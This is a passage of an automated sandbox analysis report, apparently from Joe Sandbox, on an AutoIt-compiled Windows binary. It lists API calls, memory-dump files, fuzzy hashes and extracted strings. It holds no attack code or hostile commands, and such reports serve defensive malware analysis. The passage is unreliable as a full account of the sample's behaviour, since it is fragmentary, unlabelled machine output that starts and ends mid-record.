                                                                              • SetTimer.USER32(00000000,00000000,00000028,00981256), ref: 009829FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: 2b254c85de03326e039efda0e7f0462578b9bb26358e0c1555b5610742296b87
                                                                              • Instruction ID: 5ff8a6e7c5171a730add144e3c452bab28255f48a0a954d9cdd173bb84f7671a
• Opcode Fuzzy Hash: 2b254c85de03326e039efda0e7f0462578b9bb26358e0c1555b5610742296b87
• Instruction Fuzzy Hash: E8B15D75A0020AEFDF24EFA8DD45BAE7BB4FB48711F104129FA15A72D0DB75A842CB50
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 009DA47A
• __swprintf.LIBCMT ref: 009DA51B
• _wcscmp.LIBCMT ref: 009DA52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009DA583
• _wcscmp.LIBCMT ref: 009DA5BF
• GetClassNameW.USER32(?,?,00000400), ref: 009DA5F6
• GetDlgCtrlID.USER32(?), ref: 009DA648
• GetWindowRect.USER32(?,?), ref: 009DA67E
• GetParent.USER32(?), ref: 009DA69C
• ScreenToClient.USER32(00000000), ref: 009DA6A3
• GetClassNameW.USER32(?,?,00000100), ref: 009DA71D
• _wcscmp.LIBCMT ref: 009DA731
• GetWindowTextW.USER32(?,?,00000400), ref: 009DA757
• _wcscmp.LIBCMT ref: 009DA76B
  • Part of subcall function 009A362C: _iswctype.LIBCMT ref: 009A3634
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
• Opcode ID: d302d533e41201f9bc83bcab0855f403ea6cfcaa25cb6ce560b8a93e56f97aa8
• Instruction ID: 43848a03d14fa1671c11777024f4c75b099ebfee76330e6b3a53b66fcf70742b
• Opcode Fuzzy Hash: d302d533e41201f9bc83bcab0855f403ea6cfcaa25cb6ce560b8a93e56f97aa8
• Instruction Fuzzy Hash: 70A1B071644206EFDB15DF64C884BAAB7ECFF44354F00C52AF999D2290DB30E966CB92
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 009DAF18
• _wcscmp.LIBCMT ref: 009DAF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 009DAF51
• CharUpperBuffW.USER32(?,00000000), ref: 009DAF6E
• _wcscmp.LIBCMT ref: 009DAF8C
• _wcsstr.LIBCMT ref: 009DAF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 009DAFD5
• _wcscmp.LIBCMT ref: 009DAFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 009DB00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 009DB055
• _wcscmp.LIBCMT ref: 009DB065
• GetClassNameW.USER32(00000010,?,00000400), ref: 009DB08D
• GetWindowRect.USER32(00000004,?), ref: 009DB0F6
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: de095f6d08ac5de75e947699193564310757cc52ff65477ba97c1859a228ee6b
• Instruction ID: 263baec6cd951e305a79320c61731d907dfe7deca458c1171f08195b002743f0
• Opcode Fuzzy Hash: de095f6d08ac5de75e947699193564310757cc52ff65477ba97c1859a228ee6b
• Instruction Fuzzy Hash: 8781BF71148209DFDB15DF14C881BAAB7ECEF84314F04C46AFD859A295DB34DD4ACBA2
APIs
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: db5a091c3b19b3a7f098c55d5b09ee32b9aff65d0b154d61972974e70e7eed27
• Instruction ID: 1885951f32a8e7fc7e687fd394afb737548db9adcb6e6508b6ce938f61da97f7
• Opcode Fuzzy Hash: db5a091c3b19b3a7f098c55d5b09ee32b9aff65d0b154d61972974e70e7eed27
• Instruction Fuzzy Hash: C1319671988209BBDB24FB60DD03FAEB764AF50760F604816F441712D1EF51AF14D692
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 009F5013
• LoadCursorW.USER32(00000000,00007F00), ref: 009F501E
• LoadCursorW.USER32(00000000,00007F03), ref: 009F5029
• LoadCursorW.USER32(00000000,00007F8B), ref: 009F5034
• LoadCursorW.USER32(00000000,00007F01), ref: 009F503F
• LoadCursorW.USER32(00000000,00007F81), ref: 009F504A
• LoadCursorW.USER32(00000000,00007F88), ref: 009F5055
• LoadCursorW.USER32(00000000,00007F80), ref: 009F5060
• LoadCursorW.USER32(00000000,00007F86), ref: 009F506B
• LoadCursorW.USER32(00000000,00007F83), ref: 009F5076
• LoadCursorW.USER32(00000000,00007F85), ref: 009F5081
• LoadCursorW.USER32(00000000,00007F82), ref: 009F508C
• LoadCursorW.USER32(00000000,00007F84), ref: 009F5097
• LoadCursorW.USER32(00000000,00007F04), ref: 009F50A2
• LoadCursorW.USER32(00000000,00007F02), ref: 009F50AD
• LoadCursorW.USER32(00000000,00007F89), ref: 009F50B8
• GetCursorInfo.USER32(?), ref: 009F50C8
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: f7e5b41d087ce64a685f19ae03a118da8dd349d38752b8bff207c2176ef4d019
• Instruction ID: 85fbc7cde905e5bc127d94497eb431c1769eccd500a473c549fb6dced660a956
• Opcode Fuzzy Hash: f7e5b41d087ce64a685f19ae03a118da8dd349d38752b8bff207c2176ef4d019
• Instruction Fuzzy Hash: F931F6B1D4831D6ADF109FB68C8996EBFECFF04750F54452AE60DE7280DA78A5018F91
APIs
• _memset.LIBCMT ref: 00A0A259
• DestroyWindow.USER32(?,?), ref: 00A0A2D3
  • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A0A34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A0A36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A382
• DestroyWindow.USER32(00000000), ref: 00A0A3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 00A0A3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A3F4
• GetDesktopWindow.USER32 ref: 00A0A40D
• GetWindowRect.USER32(00000000), ref: 00A0A414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A0A42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A0A444
  • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: 341874a02af07426c1d779bf61bf11c5562bf13463336413fba0c80e21e16e23
• Instruction ID: 446e7d37091aa9f40b8c69208b820c9862345a243a890d923d6a333674a6efee
• Opcode Fuzzy Hash: 341874a02af07426c1d779bf61bf11c5562bf13463336413fba0c80e21e16e23
• Instruction Fuzzy Hash: B6719B78540348AFD721CF68DC48F6A7BE5FB99300F04452CF9869B2A1CB72E902CB52
APIs
  • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
• DragQueryPoint.SHELL32(?,?), ref: 00A0C627
  • Part of subcall function 00A0AB37: ClientToScreen.USER32(?,?), ref: 00A0AB60
  • Part of subcall function 00A0AB37: GetWindowRect.USER32(?,?), ref: 00A0ABD6
  • Part of subcall function 00A0AB37: PtInRect.USER32(?,?,00A0C014), ref: 00A0ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 00A0C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A0C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A0C6BE
• _wcscat.LIBCMT ref: 00A0C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A0C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 00A0C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 00A0C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 00A0C757
• DragFinish.SHELL32(?), ref: 00A0C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A0C851
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: 838167509628d8d17f27d138f93f6b6c22d29f076160c83b3d45fdad35ac4fc6
• Instruction ID: b17cdb2e265037bd5514136012447e065a693099004a86a957b47d959823361d
• Opcode Fuzzy Hash: 838167509628d8d17f27d138f93f6b6c22d29f076160c83b3d45fdad35ac4fc6
• Instruction Fuzzy Hash: 6D617071508305AFC711EFA4DC85E9FBBE8EFC9310F400A1DF595922A1DB71994ACB52
APIs
• CharUpperBuffW.USER32(?,?), ref: 00A04424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A0446F
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 4d659e53545eb7984a4abb4cf2957efdae879b139c703dd8f30ddcea3b809ab7
• Instruction ID: 436048461ae1a1284bc72ca554ee0f997300d2fe6fb7b8daef84fae9be3e9735
• Opcode Fuzzy Hash: 4d659e53545eb7984a4abb4cf2957efdae879b139c703dd8f30ddcea3b809ab7
• Instruction Fuzzy Hash: 479138702047159FCB04EF20D851B6AB7A1BFD9354F08886DF9965B3A2DB31ED4ACB81
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A0B8B4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00A06B11,?), ref: 00A0B910
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0B949
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A0B98C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0B9C3
• FreeLibrary.KERNEL32(?), ref: 00A0B9CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A0B9DF
• DestroyIcon.USER32(?), ref: 00A0B9EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A0BA0B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A0BA17
  • Part of subcall function 009A2EFD: __wcsicmp_l.LIBCMT ref: 009A2F86
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: e567ddf0e3bcad141e7fa60874d85fdc26f0849c73896fad8b2e000cd2b2e087
• Instruction ID: c2f186e05ed98436b81405094b7169c98a1edfadfa49ffc879961d0cfaa95932
• Opcode Fuzzy Hash: e567ddf0e3bcad141e7fa60874d85fdc26f0849c73896fad8b2e000cd2b2e087
• Instruction Fuzzy Hash: 1D61DD71910209BFEB24DF64ED41FBA7BA8EB09710F108519F915E61D0DB74A981DBA0
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 009EDCDC
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 009EDCEC
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009EDCF8
                                                                              • __wsplitpath.LIBCMT ref: 009EDD56
                                                                              • _wcscat.LIBCMT ref: 009EDD6E
                                                                              • _wcscat.LIBCMT ref: 009EDD80
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009EDD95
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDA9
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDDB
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDFC
                                                                              • _wcscpy.LIBCMT ref: 009EDE08
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009EDE47
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3566783562-438819550
                                                                              • Opcode ID: 5f33010d3e7ae47477fa36a8d6b4c82ecde0e6ab5d827ee5e5ebda7db3e6cdd0
                                                                              • Instruction ID: 11b878c88b7a9471b53c772eaef1fd240f9633c3e3a58bf73fc894df03e1d9a1
                                                                              • Opcode Fuzzy Hash: 5f33010d3e7ae47477fa36a8d6b4c82ecde0e6ab5d827ee5e5ebda7db3e6cdd0
                                                                              • Instruction Fuzzy Hash: EB6168725043459FCB10EF61C844AAEB3E8FF89314F04492EF98997251EB31EE45CB92
                                                                              APIs
                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 009E9C7F
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009E9CA0
                                                                              • __swprintf.LIBCMT ref: 009E9CF9
                                                                              • __swprintf.LIBCMT ref: 009E9D12
                                                                              • _wprintf.LIBCMT ref: 009E9DB9
                                                                              • _wprintf.LIBCMT ref: 009E9DD7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 311963372-3080491070
                                                                              • Opcode ID: 796d6fc71df4731bc072231af9c2cc003376b3a0492efe3f70b010d646c25d9b
                                                                              • Instruction ID: 9cbcc829bda61a7d1508ab87102ee283cfce505b73a882b2b2fd7012bf5cd670
                                                                              • Opcode Fuzzy Hash: 796d6fc71df4731bc072231af9c2cc003376b3a0492efe3f70b010d646c25d9b
                                                                              • Instruction Fuzzy Hash: F5517D71900609ABCB15FBE0DD46EEEB778AF44300F600565F505722A2EB356E59CB60
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • CharLowerBuffW.USER32(?,?), ref: 009EA3CB
                                                                              • GetDriveTypeW.KERNEL32 ref: 009EA418
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA460
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA497
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA4C5
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 2698844021-4113822522
                                                                              • Opcode ID: 7015eae283c33bea179a481907706e0abc8cf8319129558e8621ba7b5596bf81
                                                                              • Instruction ID: 37878792f89affe6a88cd0c09c22e8c0456633cd80ec1cfff02e7aa58e3d8626
                                                                              • Opcode Fuzzy Hash: 7015eae283c33bea179a481907706e0abc8cf8319129558e8621ba7b5596bf81
                                                                              • Instruction Fuzzy Hash: 69514D755043059FC700EF11C891A6AB7E8FF94758F14886DF89A973A1DB31EE0ACB92
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,009BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 009DF8DF
                                                                              • LoadStringW.USER32(00000000,?,009BE029,00000001), ref: 009DF8E8
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • GetModuleHandleW.KERNEL32(00000000,00A45310,?,00000FFF,?,?,009BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 009DF90A
                                                                              • LoadStringW.USER32(00000000,?,009BE029,00000001), ref: 009DF90D
                                                                              • __swprintf.LIBCMT ref: 009DF95D
                                                                              • __swprintf.LIBCMT ref: 009DF96E
                                                                              • _wprintf.LIBCMT ref: 009DFA17
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009DFA2E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                              • API String ID: 984253442-2268648507
                                                                              • Opcode ID: 708930ad58a5850fe65b69c835fc693afd07c5a6c23aaaa065fa8acefaf74955
                                                                              • Instruction ID: 3d4c667e117dea5623d8e0674efc049161300c9d9becbdbce828384800a87daa
                                                                              • Opcode Fuzzy Hash: 708930ad58a5850fe65b69c835fc693afd07c5a6c23aaaa065fa8acefaf74955
                                                                              • Instruction Fuzzy Hash: B3414072804209AACF14FBE0DD57EEEB778AF94310F600465F506B6291EA35AF49CB61
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                              • String ID:
                                                                              • API String ID: 884005220-0
                                                                              • Opcode ID: 071a3dc13a5c226bd8f29da317e362568538ad574b01a5dff6c39785b5d40c38
                                                                              • Instruction ID: 191dc3deed7341039b0610ae377486d37ac6b56701fe71465aec4bfa802ec561
                                                                              • Opcode Fuzzy Hash: 071a3dc13a5c226bd8f29da317e362568538ad574b01a5dff6c39785b5d40c38
                                                                              • Instruction Fuzzy Hash: 1F613976500305AFDF209F68DE017EA77A8EF82371F214615E815AB1D1EB39DD41CBA2
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00A0BA56
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00A0BA6D
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00A0BA78
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A0BA85
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A0BA8E
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A0BA9D
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A0BAA6
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A0BAAD
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A0BABE
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A12CAC,?), ref: 00A0BAD7
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A0BAE7
                                                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 00A0BB0B
                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00A0BB36
                                                                              • DeleteObject.GDI32(00000000), ref: 00A0BB5E
                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A0BB74
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3840717409-0
                                                                              • Opcode ID: 53630e286c3bf0927da0c847299ad67c010b520fd8eef5286fe6c95f1f6fec98
                                                                              • Instruction ID: 486174ac88d668c8f665f451edc792f82e422767d19f635c0edfcfc6a76dd081
                                                                              • Opcode Fuzzy Hash: 53630e286c3bf0927da0c847299ad67c010b520fd8eef5286fe6c95f1f6fec98
                                                                              • Instruction Fuzzy Hash: 0E411975600208EFDB21DFA5ED88EAA7BB8FB89711F104168F905E72A0D7719D42CB60
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 009EDA10
                                                                              • _wcscat.LIBCMT ref: 009EDA28
                                                                              • _wcscat.LIBCMT ref: 009EDA3A
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009EDA4F
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDA63
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 009EDA7B
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 009EDA95
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDAA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                              • String ID: *.*
                                                                              • API String ID: 34673085-438819550
                                                                              • Opcode ID: 343dd7376b91ea75f271cdc49efc504c6a71ec68b0e8285ebcc3e00eaf6987a6
                                                                              • Instruction ID: c0327a65977261cc199fd8dab95a71aee26a75eb9a6a828ff0d1d1c756f55342
                                                                              • Opcode Fuzzy Hash: 343dd7376b91ea75f271cdc49efc504c6a71ec68b0e8285ebcc3e00eaf6987a6
                                                                              • Instruction Fuzzy Hash: 7B81C5715063819FCB25EF66C840A6AB7E8BF89314F184C2EF889CB252E734DD45CB52
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A0C1FC
                                                                              • GetFocus.USER32 ref: 00A0C20C
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00A0C217
                                                                              • _memset.LIBCMT ref: 00A0C342
                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A0C36D
                                                                              • GetMenuItemCount.USER32(?), ref: 00A0C38D
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00A0C3A0
                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A0C3D4
                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A0C41C
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A0C454
                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A0C489
                                                                              Strings
                                                                              Memory Dump Source
